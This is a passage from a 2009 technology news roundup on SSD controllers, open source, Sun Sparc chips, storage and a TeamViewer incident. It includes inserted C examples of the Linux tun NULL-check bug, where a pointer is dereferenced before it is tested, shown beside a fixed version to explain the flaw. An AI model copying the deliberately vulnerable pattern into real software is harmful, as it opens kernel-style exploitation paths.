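    printf("fixed(NULL)       = %d\n", poll_fixed(NULL));
    /* poll_vulnerable(NULL) would fault in user space, where page zero is
     * unmapped; the exploit's whole point is to map it first. */
    return 0;
}
```

To see the optimization itself, compile the file twice with `gcc -O2 -S` and again with `gcc -O2 -fno-delete-null-pointer-checks -S`, and compare the assembly for `poll_vulnerable`: only the second build keeps a test of the pointer before the return. The durable fix is the reordering shown in `poll_fixed`; the compiler flag is a workaround that merely stops the compiler from exposing the bug.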
TheRegister: Switch to SSD 'for free'? Sandforce explains how
by Chris Mellor
Fabless flash controller developer SandForce has let a pricing hint slip. It will reveal more of its plans and situation at the August 11-13 Flash Summit in Santa Clara. It may also be about to reveal its first supply deals.
SandForce emerged from stealth in April with NAND flash solid state disk (SSD) controller technology that used 2-bit multi-level cell flash and delivered pretty symmetric and fast read and write I/O: 30,000 IOPS and 250MB/sec with either reading or writing of 4KB data blocks.
It dealt with the limited write endurance of the flash chips by minimising the amount of written data with its DuraClass technology. The pitch was based on making cheap but limited life-cycle MLC flash practical for enterprise use, and so undercut single level cell (SLC) flash, which is faster and has a longer life than MLC flash.
Back in April (http://www.theregister.co.uk/2009/04/13/sandforce_launches/page2.html) it had evaluation technology and two products, but now pricing hints have emerged. The company is a bronze sponsor and exhibitor at the August Flash Summit in Santa Clara, and is busy hiring staff.
Productwise, SandForce has the SF-1200 mobile processor - processor being its term for controller - and the SF-1500 enterprise processor. These are both application-specific integrated circuits (ASICs) with firmware.
The SF-1500 does 250MB/sec sequential read and sequential write using 128KB blocks of data. It does 30,000 random read and write IOPS with 4KB blocks. Sixteen flash devices, from virtually any flash supplier, can be used, making it possible for OEMs or system integrators to provide various capacity SandForce-controlled SSDs. SLC chips could be used, but that would negate the making-MLC-enterprise-class pitch.
The SF-1200 has pretty much the same bandwidth (250MB/sec read versus 200MB/sec write) but lower IOPS, doing 5,000 IOPS for random 4KB reading and writing.
Pricing hints have come from an article in Greentech Media (http://www.greentechmedia.com/articles/read/a-chip-to-slash-the-power-in-data-centers/), in which SandForce CEO Alex Navqui said SandForce SSD storage could effectively be free when its total cost over five years, acquisition plus electricity, is compared with the same costs for the hard drives it replaces over the same period. The saved power cost would pay for the SandForce SSDs.
Navqui uses as a comparison a set of 240 73GB fast hard drives, which have a total storage cost/GB of $3.16, or $50,000 over five years. He says you need only nine SandForce SSDs to deliver the same IOPS, and that they have a five-year energy cost of $250. Subtracting that from the $50,000 gives $49,750, and dividing that by the number of SSDs (nine) gives a break-even SSD unit cost of $5,527. These would be SF-1500 processors with 2-bit MLC flash chips added. We don't know the unit capacity of the SandForce-controlled SSDs.
SandForce processors are intended to be used by SSD suppliers who do not have or do not want their own in-house controller technology. Given that Seagate and SandForce share a board member, C S Park, and that Seagate has reaffirmed its intention to ship its own SSD this year, there is a fairly good likelihood that it could include a SandForce controller.
IBM provided a supporting quote when SandForce came out of stealth in April but it is questionable if IBM wants to become an SSD supplier. It is perhaps more likely that a flash chip supplier, such as Samsung, might use the SandForce technology and so be able to supply system suppliers such as IBM.
Looking at the Flash Summit programme (http://www.flashmemorysummit.com/English/Conference/Seminar_Session_Descriptions.html), we notice that Xiotech's VP for Technology, Rob Peglar, is appearing in several forums. Xiotech announced SSD support in its Magnitude 3D storage arrays in 2006. It is possible that Peglar's appearance at the event may presage some kind of Xiotech SSD announcement.
The usual suspects - Intel, Micron, Numonyx, SanDisk, Samsung, STEC and others - will also be out and about at the Flash Summit, and we might well expect a mini-blizzard of flash announcements at the show.
It's noticeable that enterprise flash disk developer Pliant Technology (http://www.theregister.co.uk/2008/02/21/pliant_startup_decloaking/) does not have a presence at the Flash Summit. There were rumours of a summer announcement by the company, but nothing has come to pass and Pliant looks to be staying in stealth mode for a while longer. ®
InfoWorld: Adobe offers up more Flash technology to open source
by Paul Krill
Adobe Systems will offer more of its Flash rich media application platform up to open source Tuesday, a move viewed by analysts as reactive to the fierce competition Adobe faces in the rich Internet application space from the Microsoft Silverlight platform.
Also in the open source realm Tuesday, Canonical, commercial sponsor of the Ubuntu Linux distribution, will offer code for the Launchpad software development and collaboration platform in an open source format. The Adobe and Canonical contributions follow by one day Microsoft's contribution of 20,000 lines of device driver code for Linux.
Adobe will make available via open source the company's OSMF (Open Source Media Framework) and Text Layout Framework. Formerly part of the "Strobe" project, OSMF allows for software-based media players to be built based on the Flash platform. Individuals could, for example, add new functionality around the Flash Player.
Text Layout Framework allows users to "to do all the things you want to do with text to make it really cool" on the Flash platform, said McAllister. Sophisticated typography capabilities can be added to Web applications.
The two offerings follow previous Adobe efforts to open source parts of the platform. Previous Flash technologies released via open source have included Flex and its compilers, and the Tamarin virtual machine. Specifications also have been released for streaming formats.
"People quite often think that the Flash platform is a closed platform, Adobe-only," McAllister said. "What we're doing is continuing this commitment to making the unique features of the Flash platform open."
Although Adobe insisted its latest open source efforts were not done as any sort of response to Microsoft's Silverlight, analysts nonetheless saw a Microsoft angle.
"It's yet another example of the serve and volley going on in the RIA space," said Jeffrey Hammond, principal analyst for application development at Forrester. "Adobe and Microsoft are pushing each other hard, and as a result, the state of the art for RIAs is advancing at an amazing rate."
"Adobe is in a race with Microsoft for RIAs, and open source is a powerful way for Adobe to level the playing field considering Microsoft's huge mindshare and adoption among developers," said Melissa Webster, program vice president for content and digital media technologies at IDC.
The core Flash Player and Flex Builder IDE remain unavailable as open source, McAllister said. "There's code inside the Flash Player that we don't own," such as codec technology, he said. Flex Builder, meanwhile, is built atop the open source Eclipse IDE.
Still, developers have more open source options with Adobe than with Silverlight, said Webster. She also cited Adobe's Open Screen Project as an example of openness.
"Yes, the Flash Player remains Adobe-proprietary, however with the Open Screen Project, developers can write their own servers to stream media to the Flash Player," Webster said.
Adobe's OSMF and Text Layout Framework better enable companies to take advantage of capabilities of Flash 10 without having to understand all the "nuts and bolts of low-level ActionScript calls and functions," said Hammond. ActionScript is the programming language for the Flash platform.
Adobe is working with Akamai to coordinate OSMF with Akamai's Open Video Player initiative. The companies will provide a framework enabling partners such as developers and content owners to build new services with high-end features.
Canonical's Launchpad, meanwhile, lets developers host and share code for free using the Bazaar version control system. Developers now can contribute directly to Launchpad themselves.
"Launchpad is designed to accelerate collaboration between open source projects," said Canonical founder Mark Shuttleworth , in a statement released by the company.
"Making Launchpad itself open source fulfills a long term intention to give the users of Launchpad the ability to improve the service they use every day," Shuttleworth said.
While open source projects are hosted for free on Launchpad, closed source projects can use the service for a fee.
CNet: Moore's Law vs. the cloud
by Gordon Haff
We've been hearing a lot about thinner client devices of late. Netbooks are a hot topic, whether or not they're really a distinct category of device. I've wondered if there might not be a role for a sort of ebook-on-steroids. And Google's Chrome OS, pitched for a browser-centric world, had the digerati all in a flutter a few weeks back.
A lot of this activity reflects a general move away from software that is locally installed and run on a traditional PC to software and services housed on servers out on the network--in the cloud, to use the lingo du jour. It's enabled in no small part by increasingly pervasive networks including wireless ones of various kinds.
However, although cloud computing tracks improvements in networks, it doesn't necessarily sync up so cleanly with the parallel improvements going on in computers themselves. As a commenter put it in a recent post of mine: "The thing that I don't understand about the move to "cloud-based services" is that it seems at odds with Moore's Law. Specifically, devices are going to have more & more processing power, disk space & memory - why would you want to offload processing to the cloud?"
This is a deceptively deep comment and one that touches a lot of basic architectural questions about how we will run software and where we will run it.
One thought is that we're not really running counter to Moore's Law. Rather, we're moving the increased number of transistors that Moore's Law gives us from the client to the server. We're making clients thinner (and therefore more portable, cooler, and so forth) and the servers fatter.
There's some truth in that with mobile phones perhaps offering the clearest illustration.
But, for more notebook-like clients there's a lot of processor and graphics horsepower on the local computer that's going to waste much of the time. And, in any case, telecommunications infrastructure places hard limits on bandwidth for a given time or place, but we can dial up and down our local compute horsepower by selecting devices with different characteristics. So it makes more sense to favor local processing much of the time.
In fact, the fundamental thing that thinner clients and cloud computing tackle isn't really the movement of computing off the client but rather the movement of "state" off the client--which is to say data, applications, and customizations specific to a given user.
As a practical matter, most clients still store some amount of state. In the days of old, terminals didn't store anything locally. Sun's Sun Ray line comes closest to replicating this experience in modern thin clients. However, even browsers store cookies and can be configured with extensions and plug-ins that will vary from one installation to the next.
And, for most purposes, this is probably a reasonable enough state of affairs. Our personal devices are personal anyway; we just want to get away from having to load and manage custom software for each individual task that we want to do. Shared, public clients are a different matter, of course. However, in this case, a lowest-common-denominator software load (such as a browser) is typically sufficient.
There is clearly a lot of work left to do and battles, both technical and political, left to fight to arrive at the best architectural models and programming practices for this new generation of client-server computing. For example, do "rich Internet applications" live in the browser a la Microsoft's Silverlight or is a separate framework such as Adobe's AIR a better approach? Where do .NET and Java fit in?
These (and many others) are not small questions. Application writers need to understand at a very granular level the environment for which they're writing. And there is very much a tension between richness of the client experience and the degree to which we can standardize and simplify that client.
TheRegister: Sun cranks clocks on Sparc T2 and T2+
by Timothy Prickett Morgan
The executives at server and operating system maker Sun Microsystems have been uncharacteristically quiet since the $5.6bn Oracle deal was announced back in April. And they've been silent since Sun's shareholders approved the deal last Thursday. This - from one of the most aggressive, PR-driven firms on the planet - is a bit disturbing. But Oracle is calling the shots, which is why the IT trade press had to figure out for itself that Sun has actually done a good thing and boosted the clock speeds on its 'Niagara' family of Sparc T2 and T2+ processors.
The Sparc T2 chips, known as 'Niagara-2' internally at Sun, are used in two-socket boxes. The Sparc T2+ chips are used in four-socket machines and are known as 'Victoria Falls.' The Sparc T2 chips came out in August 2007, and the T2+ chips made their debut in October 2008.
Sun has positioned the Sparc T series of chips as leaders in performance per watt, saying it offers better bang for the buck than RISC or Itanium alternatives running Unix. For customers with Sparc-Solaris workloads, the Niagara servers offer compatibility with prior Sun UltraSparc and Fujitsu Sparc64 chips, which means customers do not have to recompile their code for the x64 variant of Solaris 10 to get a competitive entry or midrange Sparc box.
Both Sun and Fujitsu have been reselling Sparc T-based machines for the past two years, just as they both sell bigger Sparc Enterprise machines based on the quad-core Sparc64 VII processors made by Fujitsu. The T2 and T2+ chips have eight cores and eight threads per core, making them the most highly cored and threaded chips in commercial data centers today.
What Sun has not been able to do easily is get the clock speed of the chips up, and that's because it is hitting the same thermal ceiling as other chip makers. According to Sun, a 1.4 GHz Sparc T2 chip with all eight cores being stressed by an application can hit as high as 123 watts, and even during normal loading it hits 95 watts. That's about what a quad-core 'Nehalem EP' Xeon does.
The move from eight-core, four-thread Sparc T1 chips to the eight-core, eight-thread T2 chips did not change clock speed much, although the T2 did have twice as many threads and could be used in two-way machines, which gave systems about twice the oomph on workloads. Specifically, the Sparc T1 topped out at 1.2 GHz and had a 1 GHz variant. The T2 chips had a top speed of 1.4 GHz, with a 1.2 GHz variant for customers who wanted lower thermals and a 900 MHz experimental chip for even lower thermals (such as in blade servers).
Starting today, Sun and its fab partner, Texas Instruments, can deliver Sparc T2 and T2+ chips running at 1.6 GHz. Representatives from Sun were not available as we went to press with this story, so it is unclear if Sun has talked TI into doing some sort of process shrink to get the extra 14.3 per cent increase in clock speed. Considering the financial shape of Sun, it is far more likely that TI is just doing deep sorts on the Sparc T bins to find chips that can run at the higher clock speed. Hopefully, they can do so at a slightly lower voltage than the standard Sparc T2 and T2+ chips and therefore stay within the power budget.
It looks like Sun is also supporting 800 MHz DDR2 main memory in the Sparc T2 and T2+ servers too. Prior machines used 667 MHz DDR2 main memory.
Sun is charging a pretty big premium for the extra Sparc T speed bump. A T5440 server with four 1.4 GHz T2+ chips with all 256 threads activated in the four-socket box, plus 128 GB of memory and two 146 GB disks has a list price of $89,895. Jacking that machine up to four 1.6 GHz T2+ chips with the same hardware otherwise boosts the price to $115,695. That's a 28.7 per cent price hike for 14.3 per cent more clocks. On a two-socket T5240 machine using the 1.4 GHz T2 chips, a machine with 128 threads, 64 GB of memory and two 146 GB disks costs $45,495, but jumping up to the 1.6 GHz chips raises the price by 24.2 per cent to $56,495.
On the single-socket T5220 server, a machine with 64 threads running at 1.4 GHz with 32 GB of memory and two 146 GB disks costs $27,895, and Sun boosts the configuration up to 64 GB with the 1.6 GHz versions of the T2 chip and raises the price to $45,895. It is not clear what Sun is charging for 800 MHz DDR2 memory, but it is around $100 per GB on the street for 667 MHz chips for the T5220. Which means it might be as high as $150 to $200 per GB for Sun list price and then another premium for the higher memory speed. Call it around $8,000 for the incremental memory in the fatter 1.6 GHz configuration of the T5220. That would put the price premium for the 1.6 GHz chips in this single-socket box at around 36 per cent, not including the cost of the extra memory.
This is a lot to pay for extra performance. But that is what all chip makers do with their top bins.
On Tuesday, Sun also updated its Logical Domain (LDom) partitioning technology with release 1.2. The updated LDom software can power down Sparc T cores that are not being used and has a new set of built-in configuration tools that make it easier to create and deploy LDoms on the Sparc T machines. (You obviously don't need the faster processors to get the new LDom software, and Sun distributes this LDom code as a patch to the Sparc T systems for free).
The virtual networking support in LDoms now has support for jumbo frames, which makes big file transfers go faster and reduces CPU overhead. Sun has also added domain mobility with LDom 1.2, and presumably, this means that domains can be live migrated between two physical Sparc T boxes. Sun has rolled up a physical-to-virtual converter into LDom 1.2 as well, which speeds up the conversion of applications running on legacy Sparc platforms to virtual ones that can be deployed on the Niagara family of servers.
The LDom 1.1 update came out in November 2008. It included performance enhancements, virtual I/O dynamic reconfiguration, hybrid I/O for network interfaces (allowing a physical NIC to be tied to a virtual machine to boost performance), and virtual disk failover.
LDom is software that should be running on all Sparc servers and should have been on them five years ago because it is something all Sparc machines have needed. It will be interesting to see if LDoms survive the Oracle ax.
InfoWorld: Red Hat, Oracle, Sun, others join to pitch open source to feds
by Paul Krill
More than 50 companies, academic institutions, and other organizations, including vendors such as Red Hat and Oracle, are banding together to promote use of open source by the federal government via an organization called Open Source for America.
Officially unveiled on Wednesday at the O'Reilly Open Source Convention (OSCON) in San Jose, Calif., the organization is intended to capitalize on federal efforts to be more transparent and collaborative, organization members said. The federal government already has been using open source software, they recognized, but the new organization wants to further that cause.
"Most every federal agency does have open source, but essentially it's a paradigm change," said Tom Rabon, executive vice president for corporate affairs at Red Hat, a key driving member along with Sun Microsystems in forming the organization.
"This organization came about as a result of a number of companies and academic institutions and organizations that believe that there was a void in Washington in terms of having sort of a unified voice for open source," Rabon said.
Immediate goals include educating federal decision makers about open source software and encouraging government agencies to give it equal priority. Initially, the organization will have no employees; its affairs will be handled by a steering committee of organization members. Over time, there may be a staff in Washington.
"We're mainly trying to create awareness right now," Rabon said.
The IT industry has been prone to forming industry-wide organizations for different causes, some with a degree of redundancy. But there has been none specifically for educating the federal government on open source, said Jim Zemlin, executive director of the Linux Foundation, which also is participating in Open Source for America.
Among the missing from Open Source for America is Microsoft. But the company was not asked to participate, Zemlin said.
There currently are no membership fees for Open Source for America, but there may be over time, Rabon said.
Other participants in Open Source for America include Google, Mozilla, Software Freedom Law Center, Alfresco, Advanced Micro Devices, Democracy in Action, Electronic Frontier Foundation, Jaspersoft, Ingres, and Open Source Initiative.
Open Source for America was slated to have a Web site at opensourceforamerica.org.
CNet: 100,000 users to get Google Wave this fall
by Josh Lowensohn
Waiting to get your grubby mitts on Google Wave? You'll have to wait just a little bit longer.
While about 6,000 developers got their hands on Wave Monday, a post on the Google Wave developer blog says the company isn't planning to open it up to everyday users until September 30th. At that time, some 100,000 users will be let into the program. To be a part of that first run, users must have signed up to use the service on Google's invite page.
Along with a hard date on the semi-public beta test, Google also highlighted a few developer creations using Wave's API. One of them, called Waves in WordPress, lets bloggers quickly embed an entire Wave conversation into a blog post, which lets readers view and interact with it. Similar tools that let you do that with other social and blogging platforms can be expected as Wave's API matures.
First introduced at the Google I/O Conference back in late May, Wave is Google's re-imagining of Web e-mail, and a sibling of Gmail--the company's current Web mail product. It blends live chat and e-mail in one service, and is one of Google's most experimental creations yet. Google says it still has some more work to do on the project before it's ready for beta testers to start drumming on it, including how fast and stable it is.
TheRegister: Open source and the cloud: An unbalanced marriage
by Timothy Prickett Morgan
There's no question that open source software is helping vendors build utility-style infrastructure - or as the world insists on calling it: cloud computing.
But will cloud computing help the companies behind open source software, who pay their bills by collecting cash for commercial support? Or better still, will it help them stay in business at all?
Good questions. And the Red Hat-sponsored Open Source Cloud Computing Forum held Tuesday aimed to answer this and other questions from the business and technology sides. Technology dominated, but for now, let's just talk about business.
Brian Stevens, Red Hat's vice president of engineering and chief technology officer, kicked off the event with a keynote where he discussed the themes that are over familiar to us all by now:
- That IT is no longer seen as a cost center but as a means of delivering business value, etc.
- That cloud computing - which embodies virtualization and other things that make crusty IT infrastructure more resilient and flexible - would make it so that IT departments could charge back departments for the resources that they use and see a day when they no longer have to schedule downtime as they change hardware or software on their infrastructure.
- That independent software vendors see the inevitability of cloud computing and "are less defensive and are increasingly supporting" the deployment of their applications on clouds.
- That while the service level agreements on public clouds like Amazon's EC2 are good enough for application development and testing and offer substantial speed advantages when it comes to getting a test server up and running for putting code through the paces, the SLAs and the guarantees of security for applications and data deployed on clouds are currently not good enough for the deployment of production enterprise applications. Yet.
The way commercial Linux distributor Red Hat sees it, the move to cloud infrastructure is no worse and perhaps better than the old way of trying to sell into end user accounts directly. It's a lot easier, so the argument goes, to sell future cloud infrastructure makers commercial licenses to its Enterprise Linux stack and cover hundreds, thousands, or even millions of users than it is to sell directly or through a channel into those same accounts.
You make one deal, and in theory, you have sold a buttload of licenses support contracts worth ga-gillions ka-millions. And then companies who have deployed applications on public clouds decide that they want to build similar infrastructure internally on their own private clouds, and you get to sell some more licenses there too.
There are only a few problems with this theory. First, the companies actually selling cloud infrastructure - Amazon, Google, and a handful of others - are not actually using commercial Linux distros (as far as we know) to build out their clouds. That's bad news for all of the server operating system makers (including those who don't sell open source software but rather support contracts), and it's bad news for all the commercial hypervisor makers; we've noticed how they never get callbacks when they pitch their wares. In the case of Google, it's even bad news for the server makers. They're left standing at the door because Google makes its own servers.
Both Google and Amazon have essentially created their own Linux distros. And Amazon has its own version of the Xen hypervisor too. As industry analyst Matthew Aslett pointed out after Stevens' keynote, Amazon and Google provide a service based on open source software, so the modifications they make to GPL v2 programs do not have to be given back to the open source community. They would only have to contribute back if they distributed the software.
So while open source has benefited cloud providers, and this loophole in the GPL v2 license (at least from the point of view of people who would like to see Google, Amazon, and others contribute their genius to the community that they have benefited from) has allowed them to keep their intellectual property, it is not so clear that cloud computing is going to help the open source community.
InfoWorld: Virtualization to drive adoption of Fibre Channel over Ethernet
by Jon Brodkin
The Fibre Channel over Ethernet storage protocol may enhance virtualization projects by ensuring greater mobility of virtual machines, and is in the plans of more than a quarter of Fortune 1000 companies, according to new research from TheInfoPro IT consulting firm.
Few companies have begun using FCoE products, which is not a surprise given that FCoE standards have not yet been finalized, says Rob Stevenson, managing director of storage research for TheInfoPro. But storage executives at large enterprises are looking forward to benefits FCoE could bestow on virtualized servers, he says.
The simplified cabling schemes promised by FCoE will reduce the amount of physical work required to move a VM from one server to another, Stevenson says. "If there are less connection points to a virtual machine, you have more mobility," he says. Even in a virtual environment, "there are still physical interfaces beneath the hardware that have to be provisioned properly."
TheInfoPro surveyed storage executives from 303 Fortune 1000 companies between November and April for a new report titled "Fibre Channel Over Ethernet: Storage Pro Perspective." A draft FCoE standard was recently approved by a technical committee within the International Committee for Information Technology Standards and submitted for an initial public review.
When asked which applications will benefit the most from FCoE, respondents put virtualized servers at the top, followed by databases, blade servers, backup environments, Microsoft applications, disaster recovery, and data warehouses.
Storage executives generally believe FCoE "will be the dominant storage transport for the future," but adoption today is scarce, the report states. Three percent of respondents are already using FCoE technology, and another 26 percent are either piloting, evaluating or planning to deploy in the near- or long-term. National labs, telco firms and some technology companies are testing out FCoE, but it's not at the point of mainstream adoption, or for use in mission-critical applications, Stevenson notes.
Moving to FCoE offers the advantage of a loss-less protocol, but the unfinished standard does not yet have the expected multi-pathing and load balancing features, according to Stevenson.
FCoE today is therefore like a car that drives, but lacks air bags and rear view mirrors.
"When we talk to enterprises, they need the full arsenal of capabilities," he says.
Even though the standard is unfinished, companies such as Cisco, Brocade, EMC, and NetApp are releasing products to lay the groundwork for an industry-wide move to FCoE.
Brocade, for example, recently unveiled a switch and network adapters that join Fibre Channel over Ethernet and Convergence Enhanced Ethernet (CEE) into one platform, but the company says it does not expect mass adoption until 2011.
Generally, users see NetApp and Cisco as offering the best FCoE technology, Stevenson says. But they are waiting for 10 Gigabit Ethernet to become fully deployed throughout the data center before adopting FCoE, TheInfoPro states. This will take two or three years.
"For the foreseeable future, Fibre Channel will remain the incumbent technology of choice, but FCoE's advantage in terms of cable simplification, lower infrastructure cost and management are positioning it as the next-generation storage fabric," the research firm writes.
CNet: Can IT help build smart cities?
by Ina Fried
Technology has the potential to help build smarter, greener cities, but whether it will is another matter.
That was the take-away from a panel discussion Wednesday at Fortune's Brainstorm: Tech conference here.
The need for cities that use less energy is clear. Although cities occupy just 2 percent of the world's geography, they account for 75 percent of the world's greenhouse gas emissions, according to Clinton Climate Initiative Chairman Ira Magaziner. Cisco Systems CTO Padmasree Warrior noted that there will be 100 new cities with populations of more than 1 million people by 2025.
But while technology has the best potential for allowing society to maintain its standard of living in a sustainable way, the industry isn't necessarily set up to provide such technology.
"We're not there yet as an industry," said Sun Microsystems CTO Greg Papadopoulos. "Our business models are built on complexity."
Technology is also built based on frequent upgrade cycles and getting value from disposability of products. "There's a tension there," he said. "It's going to be a lot harder than you at first think."
Papadopoulos pointed to home automation as an example where the tech industry has failed to recognize the different standards needed in new markets.
"We've failed pretty miserably at that so far," he said. "They are complex and they don't work well. If we follow that model we will fail and we will be cursed."
Hara CEO Amit Chatterjee said that the focus now should be on changes that can be made without major technology shifts, giving solar and other low-carbon technologies a chance to mature.
"There is a unique opportunity to focus on low-hanging fruit or fruit that's on the ground," Chatterjee said. "That is where we need to start. Insulation is a huge win for the U.S. well before we get to solar panels."
Composting locally, he added, creates compressed natural gas that can fuel vehicles.
Chatterjee said that going after the "quick wins" could cut 30 percent of our carbon footprint.
Cutting energy use can also create jobs, the panelists agreed. But only if the right economic incentives are there, such as putting a price on carbon use.
Magaziner said awareness of the issues is improving, but that isn't enough.
"What we really need is action," he said. "The next three, four, five years are going to be critical."
TheRegister: Storage start-ups fail to set the world on fire
by Chris Mellor
Try this point of view on for size: there is no general large scale file storage problem. Companies set up to deal with that problem have failed to set the world on fire and over-invested ones, like ONSTor and Copan, are facing difficulties.
Meanwhile, block storage SAN re-invention companies, such as 3PAR and Compellent have done better, showing up the lack of customer need for a panacea for the problem of having too many files and too many large files. The panacea isn't needed because the general problem doesn't exist.
It was not supposed to be like this. Several years ago, engineers, marketeers and entrepreneurs could see a file storage problem looming. The media industry's move from analogue to digital storage was going to create millions, or even billions, of image files, music files and movie files. E-mail use was spreading like a pandemic with overflowing mail boxes, and millions of attachments, many duplicated. Collaborative software like Lotus Domino and SharePoint was causing millions more files to be created.
There was a general and continual rise in the use of unstructured information that needed to be kept, just in case it was needed. It was persistent or reference information and it was held in filer silos, hundreds of them sometimes, located across enterprises, with no co-ordination and no consistent way to search for content. The compliance and eDiscovery dynamics were, and are, often used to strengthen the supposed customer need for these products.
Storage was split into direct-attached storage (DAS) for blocks and files, network-attached storage (NAS) for files, and storage area networks (SANs) for blocks. SANs were beginning to virtualise the physical storage but there was nothing like that for file storage, NAS being far less consolidated than SANs.
The entrepreneurs, developers and engineers looked at this and saw OPPORTUNITY written large. They started up projects inside storage companies, and even started up new storage companies, to create the next killer storage product. The one that would kick the file storage problem into touch.
Their responses to the problem were different, but hindsight says they all made the mistake of assuming that the problem was larger than it actually turned out to be.
InfoWorld: Twitter hack illustrates danger of chained exploits
by Roger Grimes
Even the most securely coded piece of software can be susceptible to malicious hacking and significant exploits the moment it's linked with less-secure applications or platforms. These multiproduct, multirole exploits (also known as "chained exploits") are among the most difficult security issues to prevent. In fact, though issues may be known, they can be just as challenging to avert.
Two recent security events – one involving net/tun and a Linux compiler and the second involving Gmail, Hotmail, and Twitter – illustrate the challenges that chained exploits create. As I wrote last week in regard to the forthcoming Google Chrome OS, most - if not all - software must interact with other products and features if it's going to deliver the functionality that users demand. The trade-off can be weakened security.
The Linux kernel vulnerability emerged in the open source net/tun program. In this case, the bug was not written into the net/tun program. Rather, when the program's source code is run through a Linux compiler for optimization, the compiler introduces a kernel exploit. In particular, the compiler finds what it thinks is an unnecessary NULL check and removes an important IF-THEN statement. The subsequent exploits work even against improved security versions of Linux, such as SELinux (see a video of a representative exploit).
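The compiler behaviour described above, as a constructed C illustration added here; this is not code from the article or from the Linux tun driver, and the struct names are stand-ins for the real kernel types. It shows the defect pattern (a pointer dereferenced one line before it is tested for NULL) next to the corrected ordering:

```c
#include <stddef.h>
#include <stdio.h>

/* Constructed stand-in types; not the real kernel structures. */
struct sock { int readable; };
struct tun_struct { struct sock *sk; };

/* The defect pattern: the pointer is dereferenced BEFORE it is tested for
 * NULL. Dereferencing NULL is undefined behaviour in C, so an optimizing
 * compiler is entitled to assume tun is non-NULL once the first line has
 * executed and to delete the `if (!tun)` branch as dead code. The check
 * survives in the source but not necessarily in the binary. Calling this
 * function with NULL is the bug; the demo helpers below never do so. */
int poll_unchecked(struct tun_struct *tun)
{
    struct sock *sk = tun->sk;   /* dereference first ... */
    if (!tun)                    /* ... so this check may be optimized away */
        return -1;
    return sk->readable;
}

/* The fix: test the pointer before any dereference. The NULL path contains
 * no undefined behaviour, so the compiler must preserve the check. */
int poll_checked(struct tun_struct *tun)
{
    if (!tun)
        return -1;
    return tun->sk->readable;
}

/* Helpers that build a valid object and exercise each variant. */
int demo_valid_checked(void)
{
    struct sock sk = { 1 };
    struct tun_struct tun = { &sk };
    return poll_checked(&tun);     /* 1 */
}

int demo_valid_unchecked(void)
{
    struct sock sk = { 1 };
    struct tun_struct tun = { &sk };
    return poll_unchecked(&tun);   /* 1: correct whenever tun is valid */
}

int demo_null_checked(void)
{
    return poll_checked(NULL);     /* -1: the check is reached and honoured */
}

int main(void)
{
    printf("checked, valid tun:   %d\n", demo_valid_checked());
    printf("unchecked, valid tun: %d\n", demo_valid_unchecked());
    printf("checked, NULL tun:    %d\n", demo_null_checked());
    return 0;
}
```

Compiling with `gcc -O2 -S` and reading the assembly for `poll_unchecked` shows the comparison against NULL gone, while `poll_checked` keeps it; GCC's `-fno-delete-null-pointer-checks` switches that optimization off for code bases that cannot tolerate it. The durable fix is the ordering in `poll_checked`: validate before touching the pointer, so correctness never depends on the optimizer's view of undefined behaviour.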
The second example of a chained exploit is even more intriguing. In this case, a malicious hacker broke in to one or more Twitter employees' e-mail accounts, then publicly posted both personal and company confidential information.
The hacker accomplished this feat after discovering that a Twitter employee used Gmail and that a request for a new password for the account would be sent to the employee's Hotmail account. However, the employee had not used the Hotmail account in a very long time, so their Hotmail address was available for anyone to adopt.
CNet: Commercial open source's awkward teen years
by Matt Asay
At this week's Oscon conference, someone asked me what the secret to commercializing open-source software is, as if a secret cabal has been jealously guarding some arcane knowledge.
My response? "There is no secret: we simply don't know how to do it very well yet."
One thing, however, is clear: while the Web promises a brave new world of technical and financial prosperity, getting there from here is still very much in doubt. If we think of companies like Google as Software 2.0 and old-school vendors like IBM as Software 1.0, this leaves open-source vendors like Pentaho, MySQL, Zenoss, SugarCRM, etc. as very much Software 1.5 companies.
Or as tech journalist Glyn Moody suggests, we are in a "transitional phase, neither fish nor fowl."
I couldn't agree more.
To borrow Moody's nomenclature, much of the friction between free-software purists and open-source pragmatists stems from the malaise inherent in such an in-between state. The free-software advocates want out of the 1.0 world as soon as possible, but the vast majority of customers aren't ready to dive into Software 2.0, which leaves vendors uneasily borrowing from 1.0 business models while stretching toward 2.0 Web-based delivery mechanisms.
It's an ugly compromise at times, but it's unclear how to navigate it more cleanly than the industry already is.
Those of us working for Software 1.5 companies earnestly wish the future were already here. But after years of trying to abandon any remnants of proprietary software, it has become clear to many of us that the market, while ready to adopt open source on a grand scale, has yet to figure out how to pay for it.
I'd love nothing more than to give 100 percent of my software away for free and then charge for the service of maintaining it over the Web, or selling ads alongside content, or whatever. But the cold reality is that few enterprises actually want this, as measured by dollars they're spending. Not yet, anyway.
We are an industry in transition. Our business models have yet to catch up with our delivery models. Until they do, expect a fair amount of conflict between a company's best intentions and the exigency-driven compromise.
TheRegister: Remote IT support tool hijacks customer webserver
by Dan Goodin
On Thursday morning, IT consultant Paul Nash received an urgent call from a client whose Apache webserver had crashed the previous night and inexplicably wouldn't restart. Equally vexing, people who tried to visit the client's website during the 10-hour outage received a message advertising TeamViewer, a maker of widely used software for remotely managing PCs and servers.
After 90 minutes of troubleshooting, Nash traced the problem to TeamViewer, which he used to remotely administer the client's servers. It turns out the program had opened up its own webserver on the client's machine as soon as Apache went down and in the process made it impossible for the client, a large provider of business software, to restart its proper website.
"At that point, basically the webserver is hosed because if Apache tries to start up again, it sees someone else on port 80 and it falls over and dies, which is kind of antisocial behavior," Nash, who is the principal at Toronto-based Nash Networks, told The Register. Nash was able to get Apache up and running again by killing TeamViewer processes on the server, but by then, the client "had quite a bit of irate support requests stacked up."
The incident highlights a serious liability that comes from using what Nash otherwise regards as a great tool for remotely managing the thousands of PCs and servers entrusted to him. But what really sticks in Nash's craw, he said, is the blasé attitude TeamViewer support people showed when he reported the SNAFU.
"They said they don't see what the problem is," he said.
After he escalated the complaint, Nash finally received instructions for modifying the registry of machines running TeamViewer so its webserver won't automatically start should the normal webserver go down. But this requires him to put his hands on every machine he manages, a solution that's needlessly cumbersome.
Also concerning, said Nash, is TeamViewer's lack of disclosure that its software is receiving incoming traffic sent to machines that run the software.
"They're sitting in the middle and they're in a position to snoop on all my traffic," he said, adding that he thinks that scenario is unlikely. Still, when Nash learned that TeamViewer does monitor for incoming web requests, he said it made him wonder: "What else aren't they telling us?"
TeamViewer's website claims the software has more than 15 million installations in 50 countries. Company representatives didn't immediately respond to requests for comment sent early Friday evening Germany time. We'll be sure to update this article if they get back to us.
InfoWorld: A farewell to clouds
by William Hurley
I've really enjoyed writing for you for the past 7 months, but it's time for me to do a little less writing about cloud computing and a whole lot more working in the cloud.
